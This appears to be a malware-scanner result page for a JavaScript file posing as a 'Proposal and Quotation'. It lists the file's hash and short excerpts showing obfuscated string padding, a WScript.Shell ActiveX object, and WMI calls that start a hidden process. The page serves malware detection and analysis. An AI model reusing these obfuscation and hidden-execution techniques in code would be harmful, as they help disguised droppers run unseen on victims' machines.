Hostile 92% javascript Download

Proposal and Quotation.js

Obfuscated WMI execution, hidden process

ActiveX WSH loader launches a constructed hidden WMI commandWMI creates a hidden process with startup configuration
SHA-256d54a42b3bd479d4da911611fc771ef0cbb28dc3da408ed11d252a362e4865403

Evidence

Many long string literals concatenated in source lines 1–6
1try {
2 this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ";
3
4 var inabilities = this.methodistically || "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; this.methodistically = inabilities + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ";
5
6 for (var inabilities = 0; inabilities < 1; inabilities++) { this.methodistically = this.methodistical …
ActiveXObject instantiates WScript.Shell lines 4253–4258
4253:19… e 1: this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; break; }
4254
4255 var squbits = new ActiveXObject("WScript.Shell");
4256 for (var inabilities = 0; inabilities < 1; inabilities++) { this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
4257
4258 try { this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ …
WMI process-startup object instance lines 8243–8248
8243:116… s.methodistically = "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
8244
8245 var orkneyan = anodynia.SpawnInstance_();
8246 for (var inabilities = 0; inabilities < 1; inabilities++) { this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
8247
8248 this.methodistically = this.m …
Assigns hidden ShowWindow value lines 8338–8343
8338:114… istically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
8339
8340 orkneyan.ShowWindow = 0;
8341 try { this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; } catch(e) { this.methodistically = "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
8342
8343 t …
Four-argument Create call with null second arg lines 9098–9103
9098:138… stically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; }
9099
9100 var amateurishness = pleurosteite.Create(agnatic, null, orkneyan, betain);
9101 this.methodistically = this.methodistically + "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ";
9102
9103 var inabilities = this.methodistically || "➁Ւ෷Ꭾ⚤ⰲ/⨌ᓖդ⧢ࡀḆ⮆ᮙ"; this …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.